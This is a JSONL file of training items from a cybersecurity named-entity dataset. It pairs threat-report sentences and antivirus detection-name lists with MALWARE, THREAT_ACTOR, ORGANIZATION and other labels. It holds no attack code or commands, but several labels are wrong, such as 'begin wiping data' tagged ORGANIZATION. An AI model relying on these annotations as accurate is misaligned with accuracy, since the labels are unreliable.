{"text": "A backdoor also known as: Trojan.Win32.DownLoad1.dddutq TrojWare.Win32.Downloader.Delf.frgf Trojan.DownLoad1.22694 Downloader.Delf.Win32.47996 BehavesLike.Win32.Dropper.bm Trojan-Dropper.Delf TrojanDownloader:Win32/Parkchicers.C Trojan.Graftor.D35402", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006641", "source": "cyner2_train"}}
{"text": "They are interested in users of remote banking systems RBS, mainly in Russia and neighbouring countries.", "spans": {"MALWARE: remote banking systems RBS,": [[32, 59]]}, "info": {"id": "cyner2_train_006642", "source": "cyner2_train"}}
{"text": "This blog post describes an attack campaign where NIC National Informatics Centre Cyber Security themed spear phishing email was used to possibly target Indian government organizations.", "spans": {"THREAT_ACTOR: attack campaign": [[28, 43]], "ORGANIZATION: NIC National Informatics Centre Cyber Security": [[50, 96]], "ORGANIZATION: Indian government organizations.": [[153, 185]]}, "info": {"id": "cyner2_train_006643", "source": "cyner2_train"}}
{"text": "Instead of the normal modus operandi phishing attacks or drive-by downloads that lead to automatic execution of ransomware, the attackers gained persistent access to the victim's network through vulnerability exploitation and spread their access to any connected systems that they could.", "spans": {"MALWARE: ransomware,": [[112, 123]], "THREAT_ACTOR: attackers": [[128, 137]], "VULNERABILITY: vulnerability exploitation": [[195, 221]], "VULNERABILITY: connected systems": [[253, 270]]}, "info": {"id": "cyner2_train_006645", "source": "cyner2_train"}}
{"text": "Duuzer is a well-designed threat that gives attackers remote access to the compromised computer, downloads additional files, and steals data.", "spans": {"MALWARE: Duuzer": [[0, 6]], "MALWARE: threat": [[26, 32]], "THREAT_ACTOR: attackers": [[44, 53]], "MALWARE: remote access": [[54, 67]], "SYSTEM: compromised computer,": [[75, 96]]}, "info": {"id": "cyner2_train_006648", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.PePatch.Win32.12525 Win32.Trojan.WisdomEyes.16070401.9500.9959 TROJ_PINCAV.SME Trojan.Win32.Pincav.bbbvr Trojan.Packed.149 TROJ_PINCAV.SME BehavesLike.Win32.VirRansom.cc Worm/Kapucen.ce TrojanDropper:Win32/Bablo.B Worm/Win32.Drefir.R30526 Trojan.DR.Bablo!ESXrt1Se74g Trojan-Dropper.Win32.Bablo W32/Packcav.PLK!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006649", "source": "cyner2_train"}}
{"text": "It is notable that NetWire was also used as a payload in that campaign.", "spans": {"MALWARE: NetWire": [[19, 26]], "MALWARE: payload": [[46, 53]], "THREAT_ACTOR: campaign.": [[62, 71]]}, "info": {"id": "cyner2_train_006650", "source": "cyner2_train"}}
{"text": "CVE-2017-0199 Used as Zero Day to Distribute FINSPY Espionage Malware and LATENTBOT Cyber Crime Malware", "spans": {"VULNERABILITY: Zero Day": [[22, 30]], "MALWARE: FINSPY Espionage Malware": [[45, 69]], "MALWARE: LATENTBOT Cyber Crime Malware": [[74, 103]]}, "info": {"id": "cyner2_train_006652", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.WinSecND.Trojan Trojan.Win32.Winsecsrv.h Trojan.Win32.Winsecsrv.ebicpl TrojWare.Win32.Winsecsrv.B Trojan.Win32.Winsecsrv Trojan.Winsecsrv.ll TR/Taranis.2428 Trojan/Win32.Winsecsrv.h Trojan:Win32/Winexert.C!bit Trojan.Winsecsrv.1 Trojan.Win32.Winsecsrv.h Trojan/Win32.Dynamer.R176993 Win32.Trojan.Winsecsrv.Wwoi", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006653", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Graftor.D48EFA Trojan.DownLoader25.1955 W32/Trojan.HNMY-5442 TrojanSpy:MSIL/Hoetou.AC Trj/GdSda.A Win32/Trojan.efe", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006654", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojWare.Win32.Hadoc.AS BehavesLike.Win32.Dropper.dh Trojan.Win32.Rimecud TrojanSpy.AutoHK.a Trojan:Win32/Hadoc.A Trojan/Win32.Asprox.R130565 TrojanSpy.AutoHK Win32/Spy.AHK.E Win32/Trojan.bc3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006655", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.VBCloneAATTc.Worm Trojan.VBClone.S500460 Trojan/VBClone.b Win32.Adware.Kryptik.h Trojan.Dropper Trojan.Win32.VB.cuvt Trojan.Win32.VB.dwthyt TrojWare.Win32.VBClone.CUV Trojan.VbCrypt.250 BehavesLike.Win32.VBObfus.qz Trojan.Crypt Trojan/VB.czdk Trojan/Win32.VB.cuvt Troj.W32.VB.tnqI Trojan.Win32.VB.cuvt TScope.Trojan.VB Win32/VBClone.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006656", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Small.15973 Win32.Trojan.WisdomEyes.16070401.9500.9775 Trojan.Dropper TROJ_MICROJOIN.W Trojan.Win32.Small.dpzper TrojWare.Win32.TrojanProxy.Puma.jsjk Trojan.Celln TROJ_MICROJOIN.W Trojan-Proxy.Win32.Puma Trojan:Win32/Ditul.B Trojan.Heur.RP.ciWfayCj9ogb Trojan/Win32.Xema.C32762", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006657", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader.Iterign.B3 Trojan.Win32.FAUL.exlexh Packed:MSIL/SmartIL.A BehavesLike.Win32.Trojan.dc TR/Dropper.MSIL.hxupg Trojan.Razy.D1E910 TrojanDownloader:MSIL/Iterign.B Trojan/Win32.ZBot.R139607 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006660", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Disabler!O WORM_DISABLER.SM Win32.Trojan.WisdomEyes.16070401.9500.9981 W32.Glupzy.A WORM_DISABLER.SM Win.Trojan.Disabler-3 Trojan.Win32.Disabler.i Trojan.Win32.Disabler.beace TrojWare.Win32.Disabler.~A Trojan.Flashy BehavesLike.Win32.Downloader.qz Trojan/Win32.Disabler Troj.W32.Disabler.tnvR Trojan.Win32.Disabler.i Worm/Win32.IRCBot.R53504 Trojan.Disabler Win32/Disabler.I Trj/Flashy.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006661", "source": "cyner2_train"}}
{"text": "In order to support network defenders,Fidelis Cybersecurity is offering a new, free data feed of verified indicators to support thedetection and mitigation of Pushdo.", "spans": {"ORGANIZATION: defenders,Fidelis Cybersecurity": [[28, 59]], "MALWARE: Pushdo.": [[159, 166]]}, "info": {"id": "cyner2_train_006662", "source": "cyner2_train"}}
{"text": "The sample discussed was found during an incident response engagement in March 2017.", "spans": {}, "info": {"id": "cyner2_train_006663", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Lowzones.A6 Trojan.Zzinfor.1 Trojan.Win32.Dwn.dndeiz TrojWare.Win32.Zzinfor.KQ Trojan.DownLoader12.14740 Trojan.Win32.Spy Adware.Zzinfor/Variant Dropper/Win32.Injector.C189960", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006665", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.PWS.ZER Troj.Pws.Zer!c Trojan.PWS.ZER Win32.Trojan.WisdomEyes.16070401.9500.9954 Trojan.Bitterbug Trojan.PWS.ZER Trojan.PWS.ZER Trojan.PWS.ZER BehavesLike.Win32.Dropper.ch TR/PSW.ZER Backdoor:Win32/Saluchtra.B!dha Spyware.Infostealer.FakeMS Win32.Trojan.Psw.Liqs Trojan.Bitterbug! Trojan.Win32.Bitterbug Trojan.PWS.ZER", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006666", "source": "cyner2_train"}}
{"text": "One would think that this would result in widespread use, but instead it has only been found in limited areas.", "spans": {}, "info": {"id": "cyner2_train_006667", "source": "cyner2_train"}}
{"text": "This malvertising attack preyed on visitors to sketchy websites offering anything from torrents of copyrighted movies, live streams of the latest flicks, or pirated software.", "spans": {}, "info": {"id": "cyner2_train_006669", "source": "cyner2_train"}}
{"text": "Very active, we can now see ~ 50k live scanner IPs daily.", "spans": {}, "info": {"id": "cyner2_train_006670", "source": "cyner2_train"}}
{"text": "Android ransomware that claims it has detected forbidden pornographic pictures on your device, says it has reported it to the FBI and asks you to pay a fine of $500.", "spans": {"MALWARE: Android ransomware": [[0, 18]], "ORGANIZATION: FBI": [[126, 129]]}, "info": {"id": "cyner2_train_006671", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDropper.Gepys.A Trojan.Kryptik.Win32.524542 Trojan/Kryptik.banx Win32.Trojan.Kryptik.eg Trojan.Win32.Redirect.ctxvfh TrojWare.Win32.Kryptik.BANN Trojan.Redirect.147 Trojan/ShipUp.km Trojan/Win32.Unknown Trojan:Win32/Gepys.A Trojan.Zusy.D404B9 Trojan/Win32.Shipup.R65212 Trojan-Downloader.Win32.Dofoil", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006674", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.BCC5 W32.Virut.G Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Foreign-502 Trojan.DownLoader11.60294 BehavesLike.Win32.Sality.cc Win32.Virut.eb.368640 Trojan/Win32.Foreign.R131573 Trojan-Ransom.Win32.Foreign", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006677", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Strictor.D2148 Win32.Trojan.WisdomEyes.16070401.9500.9567 Trojan-Downloader.Win32.Perkesh HackTool[VirTool]/Win32.Unknown", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006681", "source": "cyner2_train"}}
{"text": "The exploit was delivered through a Microsoft Office document and the final payload was the latest version of FinSpy malware.", "spans": {"MALWARE: The exploit": [[0, 11]], "MALWARE: payload": [[76, 83]], "MALWARE: FinSpy malware.": [[110, 125]]}, "info": {"id": "cyner2_train_006685", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.DomytnxASAAAC.Trojan Trojan.Locky.Win32.658 Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Trojan.KGRA-2902 Ransom_HPLOCKY.SM4 Trojan-Ransom.Win32.Locky.aoc Trojan.Win32.Encoder.eemdlz Trojan.Win32.Locky.288947 Troj.Ransom.W32.Locky!c Trojan.Encoder.3976 Ransom_HPLOCKY.SM4 BehavesLike.Win32.MultiPlug.cc Trojan.Locky.aqx Trojan[Ransom]/Win32.Locky Trojan.Mikey.DC99C Trojan-Ransom.Win32.Locky.aoc TrojanDownloader:Win32/Terdot.A Trojan/Win32.Locky.C1503881 Trojan-Ransom.Locky Trj/CI.A W32/Bebloh.K!tr Win32/Trojan.Ransom.2d2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006686", "source": "cyner2_train"}}
{"text": "MalwareBytes have been monitoring a malvertising campaign very closely as it really soared during the past week.", "spans": {"ORGANIZATION: MalwareBytes": [[0, 12]], "THREAT_ACTOR: malvertising campaign": [[36, 57]]}, "info": {"id": "cyner2_train_006687", "source": "cyner2_train"}}
{"text": "With this information, an attacker can access a user's Google account data like Google Play, Google Photos, Gmail, Google Drive, and G Suite.", "spans": {"THREAT_ACTOR: attacker": [[26, 34]], "SYSTEM: Google account data": [[55, 74]], "SYSTEM: Google Play, Google Photos, Gmail, Google Drive,": [[80, 128]], "SYSTEM: G Suite.": [[133, 141]]}, "info": {"id": "cyner2_train_006688", "source": "cyner2_train"}}
{"text": "A backdoor also known as: VBA/PowerShell.A Win.Trojan.PowerShell-8 Trojan.Ole2.Vbs-heuristic.druvzi TrojanDownloader:O97M/Poseket.A HEUR.VBA.Trojan.e heur.macro.powershell.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006689", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TR/Spammer.Z Trojan.Win32.Spammer.BZ Trojan.SpamTool SpamTool.KEM Trj/CI.A Win32/Trojan.Spammer.4de", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006690", "source": "cyner2_train"}}
{"text": "The Executive Yuan Council evaluates statutory and budgetary bills and bills concerning martial law, amnesty, declaration of war, conclusion of peace and treaties, and other important affairs.", "spans": {"ORGANIZATION: The Executive Yuan Council": [[0, 26]]}, "info": {"id": "cyner2_train_006692", "source": "cyner2_train"}}
{"text": "Recently, we've seen information indicating that the scope of targets can be wider and is no longer limited to the entertainment business.", "spans": {}, "info": {"id": "cyner2_train_006694", "source": "cyner2_train"}}
{"text": "This blog will discuss and uncover additional details regarding a recent campaign targeting entities in the Middle East.", "spans": {"THREAT_ACTOR: campaign": [[73, 81]]}, "info": {"id": "cyner2_train_006695", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HackTool.Inject!QFG7kQRUHDk Trojan.VBInject!4947 Malware_fam.NB Skodna.GameHack.CXD Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006698", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FOverND.PE Virus.Win32.Sality!O W32.Sivis.A3 Backdoor.Poison.Win32.87654 Trojan/Kryptik.gace W32.Suviapen Packed.Win32.Krap.jc Trojan.Win32.Kespo.evacni Win32.HLLP.Kespo.4 BehavesLike.Win32.Trojan.vh Packed.Krap.fzmh Trojan[Packed]/Win32.Krap Packed.Win32.Krap.jc Trojan-Ransom.Rokku RAT.Sakula", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006699", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Arande.A3 Win32.Worm.VB.nr Trojan.Win32.VB.dibs Win32.Trojan.Vb.Wnwj Trojan.VB.Win32.116507 Trojan/VB.cujo W32.Heuristic.Dkvt TR/Taranis.2367 Trojan.Heur.E914A2 Trojan.Win32.VB.dibs Trojan/Win32.VBKrypt.C956342 Trojan.VB!SXP1KraqrZw Trojan.VB2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006701", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Trupto TROJ_INJECTR.BUSZ Trojan.Win32.Buzus.yhkt Trojan.Win32.Buzus.ewiofb TROJ_INJECTR.BUSZ Trojan.Win32.Crypt W32/Trojan.ALBD-0280 Trojan.Buzus.cni Trojan:Win32/Trupto.A Trojan.Win32.Buzus.yhkt Trj/CI.A Win32.Trojan.Inject.Auto", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006703", "source": "cyner2_train"}}
{"text": "To distribute the Trojan, cybercriminals log in to the vulnerable devices via the SSH protocol.", "spans": {"MALWARE: Trojan,": [[18, 25]], "THREAT_ACTOR: cybercriminals": [[26, 40]], "SYSTEM: vulnerable devices": [[55, 73]]}, "info": {"id": "cyner2_train_006706", "source": "cyner2_train"}}
{"text": "Proofpoint researchers originally spotted the MarsJoke ransomware in late August by trawling through our repository of unknown malware.", "spans": {"ORGANIZATION: Proofpoint researchers": [[0, 22]], "MALWARE: MarsJoke ransomware": [[46, 65]], "MALWARE: unknown malware.": [[119, 135]]}, "info": {"id": "cyner2_train_006707", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.ReplaceMiKsLT.Fam.RSF Trojan-PWS/W32.Frethoq.34461.C Trojan-GameThief.Win32.Frethoq!O TrojanPWS.Lolyda.BF5 Troj.GameThief.W32.OnLineGames.lnFT Trojan/OnLineGames.qbf TROJ_RVERSE.SMI Win32.Trojan-PSW.OLGames.i TROJ_RVERSE.SMI Win32.Trojan-Spy.Lolyda.A Trojan-GameThief.Win32.OnLineGames.ajqgf Trojan.Win32.Gamania.thvvt Trojan.Win32.A.Zbot.34461 Trojan.PWS.Gamania.36445 BehavesLike.Win32.PWSOnlineGames.nh TR/PSW.Lolyda.bfmna Trojan[GameThief]/Win32.Frethoq PWS:Win32/Lolyda.BF Trojan-GameThief.Win32.OnLineGames.ajqgf Trojan/Win32.OnlineGameHack.R21894 BScope.Trojan.OLGames.4521 Trojan.Zusy.DBE3 Win32/PSW.OnLineGames.QBF Trojan.PSW.Win32.GamePass.a Trojan.PWS.OnLineGames!V9usvrFPqu0 Trojan-PWS.Win32.Lolyda W32/OnLineGames.REV!tr Trojan.PSW.Win32.GameOnline.CO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006709", "source": "cyner2_train"}}
{"text": "The group is known to use custom malware called Daserf, but also employs multiple commodity and custom tools, exploit vulnerabilities, and use social engineering techniques.", "spans": {"THREAT_ACTOR: The group": [[0, 9]], "MALWARE: custom malware": [[26, 40]], "MALWARE: Daserf,": [[48, 55]], "MALWARE: custom tools, exploit": [[96, 117]], "VULNERABILITY: vulnerabilities,": [[118, 134]]}, "info": {"id": "cyner2_train_006711", "source": "cyner2_train"}}
{"text": "Its targets include the military organizations and governments of countries with national interests in the South China Sea, including some within the U.S. defense industrial base.", "spans": {"ORGANIZATION: military organizations": [[24, 46]], "ORGANIZATION: governments of countries": [[51, 75]]}, "info": {"id": "cyner2_train_006714", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Noancooe MSIL.Backdoor.Bladabindi.AM TR/Nanocore.dfari Trojan:MSIL/Noancooe.D!bit Trj/CI.A Worm.Win32.Ainslot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006718", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Sasfis.4023296 Trojan/Sasfis.bnyn Trojan.Strictor.DEB1C Win32.Trojan.WisdomEyes.16070401.9500.9554 Backdoor.Graybird Win.Trojan.Yobdam-4 Trojan-Dropper.Win32.Dapato.bwsw Trojan.Win32.Sasfis.diovf Trojan.MulDrop2.58470 Backdoor.Yobdam.Win32.845 BehavesLike.Win32.BadFile.wc Trojan/Buzus.awfr Trojan/Win32.Sasfis Trojan-Dropper.Win32.Dapato.bwsw Trojan/Win32.Injector.C1773 SScope.Trojan.MBRLock.2121 Trojan.Sasfis!aSW+l8me7nU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006720", "source": "cyner2_train"}}
{"text": "YOUR FILES WERE ENCRYPTED.", "spans": {}, "info": {"id": "cyner2_train_006721", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Infostealer.Lineage Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Nilage.XS Infostealer.Lineage Trojan-GameThief.Win32.Nilage.bdm W32.W.Bagle.kZt7 Trojan.PWS.Lineage.9841 BehavesLike.Win32.Pate.pc Trojan-PWS.Win32.Delf W32/Nilage.KWZM-6493 Trojan/PSW.Nilage.auz Trojan[GameThief]/Win32.Magania Trojan-GameThief.Win32.Nilage.bdm Trojan/Win32.OnlineGameHack.R24518 PWS-Gamania.dll Infostealer.Lineage MalwareScope.Trojan-PSW.Game.13 Trojan.PWS.Nilage!v/lUmVrQ3Ac", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006722", "source": "cyner2_train"}}
{"text": "According to X-Force research, the new banking Trojan emerged in the wild in September 2017, when its first test campaigns were launched.", "spans": {"ORGANIZATION: X-Force research,": [[13, 30]], "MALWARE: banking Trojan": [[39, 53]], "THREAT_ACTOR: first test campaigns": [[102, 122]]}, "info": {"id": "cyner2_train_006723", "source": "cyner2_train"}}
{"text": "The focus of this blog post is MiKey, a little-known and poorly detected keylogger.", "spans": {"MALWARE: MiKey,": [[31, 37]], "MALWARE: keylogger.": [[73, 83]]}, "info": {"id": "cyner2_train_006724", "source": "cyner2_train"}}
{"text": "This post will use the PlugX malware as an example PlugX is well known and has had its various iterations analyzed many times, due in part to its ongoing activity and will focus on leveraging metadata from VirusTotal due to it being publicly accessible.", "spans": {"MALWARE: PlugX malware": [[23, 36]], "MALWARE: PlugX": [[51, 56]], "ORGANIZATION: VirusTotal": [[206, 216]]}, "info": {"id": "cyner2_train_006726", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.5FA3 Trojan.Glox Infostealer.Gampass Packed.Win32.MUPACK.~KW BehavesLike.Win32.Spybot.dc Trojan/Win32.ADH Trj/Pupack.A Win32.Trojan.Xed.Dzkj", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006727", "source": "cyner2_train"}}
{"text": "Maktub Locker is another ransomware that comes with a beautifully designed GUI and few interesting features.", "spans": {"MALWARE: Maktub Locker": [[0, 13]], "MALWARE: ransomware": [[25, 35]]}, "info": {"id": "cyner2_train_006730", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Packed.Win32.CPEX-based!O Trojan.Delfinject.16926 PWS-LDPinch.a!hv Trojan.Buzus.Win32.2199 Trojan/Buzus.rrb TROJ_FAM_0001199.TOMA Win32.Trojan.WisdomEyes.16070401.9500.9967 Win32/Lunibot.B TROJ_FAM_0001199.TOMA Win.Trojan.Buzus-2288 Packed.Win32.CPEX-based.eq Trojan.Win32.CPEXbased.bejytp Trojan.Win32.Buzus.374868 Win32.Trojan.Dovqplay.clht TrojWare.Win32.TrojanDropper.Binder.G BackDoor.Poison.61 BehavesLike.Win32.SoftPulse.tc Virus.Win32.DelfInject W32/Trojan2.CYTZ Trojan/Buzus.puv Trojan[Packed]/Win32.CPEX-based Backdoor:Win32/Mielit.A Packed.Win32.CPEX-based.eq Trojan/Win32.Xema.R44960 BScope.Binder.Buzus.er W32/Buzus.BZ.worm VirTool.DelfInject!GapcEdmyxw8 W32/Injector.fam!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006737", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.XinarilD.Trojan Trojan.Zusy.D26766 Trojan.Win32.Zusy.exkztw W32/Trojan.HJTJ-8943 Trojan/Scar.bmgw TR/Zusy.2726400 Trojan:Win64/SvcMiner.A Trojan.Win32.Z.Zusy.2726400.CY Backdoor.Bot Trj/CI.A Trojan.Scar!zCrXbtgxLOk Win32/Trojan.e88", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006738", "source": "cyner2_train"}}
{"text": "In this post, we will focus on the mobile part of their operation and discuss in detail several Android and BlackBerry apps they are using.", "spans": {"THREAT_ACTOR: operation": [[56, 65]], "SYSTEM: Android": [[96, 103]], "SYSTEM: BlackBerry apps": [[108, 123]]}, "info": {"id": "cyner2_train_006739", "source": "cyner2_train"}}
{"text": "Unit 42 researchers identified a new OS X Trojan associated with the Sofacy group that we are now tracking with the Komplex' tag using the Palo Alto Networks AutoFocus threat intelligence platform.", "spans": {"ORGANIZATION: Unit 42 researchers": [[0, 19]], "SYSTEM: OS X": [[37, 41]], "MALWARE: Trojan": [[42, 48]], "THREAT_ACTOR: Sofacy group": [[69, 81]], "MALWARE: Komplex'": [[116, 124]], "ORGANIZATION: Palo Alto Networks": [[139, 157]], "SYSTEM: AutoFocus threat intelligence platform.": [[158, 197]]}, "info": {"id": "cyner2_train_006740", "source": "cyner2_train"}}
{"text": "We are accustomed to seeing this gate operate directly from typical' compromised websites, but not so much from ad serving ones.", "spans": {}, "info": {"id": "cyner2_train_006741", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9959 Trojan.Win32.Yuzi.euhfho Backdoor.Yuzi W32/Trojan.UPLJ-0202 BDS/Yuzi.lbwpa Trojan.Win32.Z.Ursu.91648 Backdoor:MSIL/Yuzi.A Trj/GdSda.A Win32/Trojan.fd2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006742", "source": "cyner2_train"}}
{"text": "In addition to Russia, targeted regions include neighboring countries such as Mongolia, Belarus, and other European countries.", "spans": {}, "info": {"id": "cyner2_train_006743", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Klevate.S3 Trojan.Webprefix.Win32.62419 Trojan.Dropper.104 Win32.Trojan.Webprefix.a W32/WebPrefix.A Trojan.Win32.Webprefix.crgiyt Backdoor.W32.Androm.mCpQ TrojWare.Win32.Sisron.C BackDoor.Bulknet.1328 BehavesLike.Win32.Trojan.cc W32/Application.KRYM-8973 TrojanDownloader.Klevate.a Win32.Trojan-Dropper.Dlpro.A Trojan/Win32.Zbot.R94414 Win32/Webprefix.D W32/Webprefix.B!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006744", "source": "cyner2_train"}}
{"text": "It is therefore impossible to decode the communication if one wasn't listening right from its beginning.", "spans": {}, "info": {"id": "cyner2_train_006746", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Banker.Win32.BHO!O Win32.Trojan.WisdomEyes.16070401.9500.9988 Backdoor.Ratenjay Trojan-Downloader.Win32.VB.ifws Trojan.DownLoader5.54023 Trojan.Kazy.DE581 Trojan-Downloader.Win32.VB.ifws Downloader/Win32.Banload.C62226 Trojan-Downloader.Win32.Bancos", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006747", "source": "cyner2_train"}}
{"text": "So , what can you do to protect yourself from this stealthy beast ? 1 .", "spans": {}, "info": {"id": "cyner2_train_006749", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/HLLW.Std.B Worm/STD.B W32/Std.18437 Win32/HLLP.Std.B Worm.STD.A I-Worm.STD.B.nw5 Email-Worm.Win32.STD.B I-Worm/STD.b Email-Worm.Win32.Std.B W32/HLLW.Std.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006756", "source": "cyner2_train"}}
{"text": "The end payload that was installed is the HttpBrowser RAT, known to be used by the Chinese group in previous targeted attacks against governments.", "spans": {"MALWARE: payload": [[8, 15]], "MALWARE: RAT,": [[54, 58]], "THREAT_ACTOR: the Chinese group": [[79, 96]], "ORGANIZATION: governments.": [[134, 146]]}, "info": {"id": "cyner2_train_006758", "source": "cyner2_train"}}
{"text": "This Trojan is interesting due to its ability to steal logins, passwords, and other confidential data by displaying fraudulent authentication forms on top of any applications.", "spans": {"MALWARE: Trojan": [[5, 11]], "SYSTEM: applications.": [[162, 175]]}, "info": {"id": "cyner2_train_006759", "source": "cyner2_train"}}
{"text": "It appears the purpose of the new Disttrack samples were solely focused on destruction, as the samples were configured with a non-operational C2 server to report to and were set to begin wiping data exactly on 2016/11/17 20:45.", "spans": {"MALWARE: Disttrack samples": [[34, 51]], "ORGANIZATION: begin wiping data": [[181, 198]]}, "info": {"id": "cyner2_train_006760", "source": "cyner2_train"}}
{"text": "Kazuar includes a highly functional command set, which includes the ability to remotely load additional plugins to increase the Trojan's capabilities.", "spans": {"MALWARE: Kazuar": [[0, 6]], "MALWARE: Trojan's": [[128, 136]]}, "info": {"id": "cyner2_train_006761", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FakeSvchostsysLnrA.Trojan Win32.Trojan.WisdomEyes.16070401.9500.9849 Trojan.Win32.Downloader.40960.TR Trojan.Win32.Swisyn W32/Trojan.UTND-0495 Downloader/Win32.OnlineGameHack.R3893 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006762", "source": "cyner2_train"}}
{"text": "However, many of these malware are fileless only while entering a user's system, as they eventually reveal themselves when they execute their payload.", "spans": {"MALWARE: malware": [[23, 30]], "MALWARE: fileless": [[35, 43]], "SYSTEM: a user's system,": [[64, 80]], "MALWARE: payload.": [[142, 150]]}, "info": {"id": "cyner2_train_006763", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Skeeyah.9109 Trojan.Injector BKDR_RMTSVC.V W32/Trojan.FQOB-6520 BKDR_RMTSVC.V Trojan.Win32.Pincav.darg Trojan.Win32.Pincav.dmwojx Troj.W32.Pincav!c Trojan.Inject1.50635 Trojan.Pincav.Win32.24903 BehavesLike.Win32.Dropper.gc Trojan.Pincav.um Trojan.Win32.Pincav.darg Backdoor:Win32/Rmtsvc.C!bit Trojan.Pincav Win32.Trojan.Pincav.Akpm Trojan.Pincav!MRbJOfrjW/0 Backdoor.Win32.RmtSvc W32/Pincav.B!tr Win32/Trojan.84c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006764", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Hupigon.Win32.133953 Win32.Trojan.WisdomEyes.16070401.9500.9985 W32/QQRob.LP Trojan.PWS.QQPass Win32/AdClicker.UB Backdoor.Win32.Hupigon.olbg Trojan.Win32.Hupigon.eajxbh Trojan.PWS.Qqrobber.155 trojan.win32.dorv.a PWS-Gamania.dll W32/QQRob.TWJB-5358 Trojan/PSW.QQRobber.iu DR/PSW.QQRob.V.2 Trojan[Backdoor]/Win32.Hupigon Trojan.Heur.PT.E044E0 Trojan/Win32.Pwstealer.C63180 PWS-Gamania.dll Win32/PSW.QQRob.NAH Backdoor.Win32.Hupigon Win32/Cekar.G Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006765", "source": "cyner2_train"}}
